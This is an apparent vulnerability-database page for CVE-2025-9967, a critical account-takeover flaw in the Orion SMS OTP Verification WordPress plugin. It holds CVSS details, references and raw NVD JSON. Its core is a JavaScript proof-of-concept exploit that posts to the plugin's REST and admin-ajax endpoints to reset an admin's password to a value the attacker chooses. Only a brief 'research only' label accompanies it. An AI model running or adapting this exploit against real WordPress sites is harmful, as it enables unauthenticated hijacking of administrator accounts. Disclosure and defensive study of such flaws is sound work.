Security Vulnerability Report
CVE-2025-9967 (CVSS 9.8, CRITICAL)

Published: 2025-10-15 09:15:44
Last Modified: 2026-04-15 00:35:42

Description

The Orion SMS OTP Verification plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.1.7. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change an arbitrary user's password to a one-time password if the attacker knows the user's phone number.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Orion SMS OTP Verification <= 1.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
/*
 * CVE-2025-9967 - Orion SMS OTP Verification Privilege Escalation PoC
 * Vulnerability: Unauthenticated Password Reset / Account Takeover
 * Affected: Orion SMS OTP Verification <= 1.1.7
 *
 * This PoC demonstrates how an unauthenticated attacker can take over
 * an arbitrary user's account by exploiting the insecure password reset
 * functionality in the reset-password.js endpoint.
 */

// Step 1: Identify the target user's phone number (out of band)
// The attacker needs to know the phone number associated with the target account.
const targetPhoneNumber = "+1234567890"; // Target user's phone number
const targetUserId = 1;                   // Target user ID (e.g., admin)
const attackerControlledOTP = "123456";   // OTP value the attacker will set

// Step 2: Send a password reset request to the vulnerable endpoint
// The plugin's reset-password.js does not verify the requester's identity
fetch('/wp-json/orion-sms-otp/v1/reset-password', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'X-WP-Nonce': '' // No nonce required - vulnerability
  },
  body: JSON.stringify({
    user_id: targetUserId,
    phone: targetPhoneNumber,
    new_password: attackerControlledOTP
  })
})
  .then(response => response.json())
  .then(data => {
    console.log("Password reset response:", data);
    // Step 3: Login with the attacker-controlled OTP/password
    if (data.success) {
      console.log("Account takeover successful!");
      // Now log in with the target username and the OTP as password
    }
  });

// Alternative: Direct AJAX call mimicking the vulnerable plugin logic
function exploitResetPassword(userLogin, phone, newPassword) {
  var formData = new FormData();
  formData.append('action', 'orion_sms_otp_reset_password');
  formData.append('user_login', userLogin);
  formData.append('phone_number', phone);
  formData.append('new_password', newPassword);
  formData.append('otp', newPassword); // OTP equals the new password
  return fetch('/wp-admin/admin-ajax.php', { method: 'POST', body: formData });
}

// Execute the exploit
exploitResetPassword('admin', targetPhoneNumber, attackerControlledOTP)
  .then(res => res.text())
  .then(result => console.log("Exploit result:", result));

References

- https://plugins.trac.wordpress.org/browser/orion-sms-otp-verification/trunk/vendor/js/reset-password.js
- https://plugins.trac.wordpress.org/log/orion-sms-otp-verification/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b121fdb4-93a8-400c-89c2-3195cb40e03c?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9967", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:43.500", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Orion SMS OTP Verification plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.1.7. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's password to a one-time password if the attacker knows the user's phone number"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/orion-sms-otp-verification/trunk/vendor/js/reset-password.js", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/log/orion-sms-otp-verification/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b121fdb4-93a8-400c-89c2-3195cb40e03c?source=cve", "source": "[email protected]"}]}}